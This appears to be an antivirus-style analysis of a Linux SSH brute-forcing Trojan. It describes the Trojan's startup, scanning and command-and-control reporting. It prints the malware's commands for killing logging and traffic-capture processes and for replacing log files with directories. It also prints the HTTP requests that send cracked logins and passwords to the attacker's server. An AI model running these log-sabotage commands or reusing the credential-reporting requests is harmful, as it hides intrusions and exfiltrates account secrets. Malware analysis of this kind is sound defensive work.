SHA1:
- c93957405ed43d8cca936dcf9a894a82fa10a518 (unpacked)
- 8b34e16d1542766d7c09472dfa23a69a0e1c13ce (UPX)
A Trojan for Linux designed for brute-forcing accounts in order to get access to an attacked system using the SSH protocol. Once launched, it takes one incoming argument:
auto:zzz.ccc.vvv.bbbгде zzz.ccc.vvv.bbb (command and control server IP)
Once launched, the Trojan removes its own working directory ("/tmp/.../") and clears the list of iptables rules. Then it “kills” processes of a number of running applications—for example, of programs used to log events and analyze traffic:
killall syslogd rsyslogd syslog syslog-ng named dnscache dnsmasq tcpdump
killall -9 syslogd rsyslogd syslog syslog-ng named dnscache dnsmasq tcpdump
kill -9 `pidof syslogd rsyslogd syslog syslog-ng named dnscache dnsmasq tcpdump`
Using the "/var/log/*" and "/disk/*log*" masks, the Trojan replaces existing directories and system log files with folders under the same names—this makes creation of logs with identical names in future impossible:
mkdir /var/log/all.log /var/log/auth.log /var/log/messages /var/log/secure /var/log/everything.log /var/log/messages.log /disk/all.log /disk/auth.log /disk/messages /disk/secure /disk/everything.log /disk/messages.log
Then the Trojan extracts from /proc/cpuinfo the processor frequency value specified in the "bogomips" parameter. Based on this value, the malicious program calculates the total number of scanning threads and SSH connections.
After that, the Trojan refers for tasks to the server whose address it gets as an incoming argument on startup. A task obtained from the server contains an IP address of a subnet that the malicious program scans for devices with open SSH connections on port 22. If such devices are detected, the Trojan tries to connect to them by going through all login:password pairs from a special list. If such an attempt is successful, the Trojan sends an appropriate message to the server controlled by cybercriminals.
GET /auto.cgi?root=yes&ip=%s&l=%s&p=%s HTTP/1.0\nUser-Agent:
Mozilla\nAccept-Language: en\nHost: auto\nCopyright: 2005 by RS from
Romania Hello World Microsoft Sucks Bill Gates Must die\n\nwhere ip indicates the IP address of the node to which the connection is established, l indicates the login, and p indicates the password.
Using a separate thread, the malware sends the following request to the command and control server with a one-minute interval:
GET
/auto.cgi?report=yes&finish=%d&net=%s&seconds=%d&open=%d&rootcount=%d&s
shspeed=%d&totalssh=%d&ssherrors=%d&totalscan=%d&scanmax=%d&sshmax=%d
HTTP/1.0\nUser-Agent: Mozilla\nAccept-Language: en\nHost:
auto\nCopyright: 2005 by RS from Romania Hello World Microsoft Sucks
Bill Gates Must die\n\nAt that, the “finish” value equals zero. Once scanning is over, the Trojan sends 10 similar requests containing the “finish” value of 1 with a 1-second interval.
The net parameter contains the IP address of the subnet currently scanned by the Trojan.
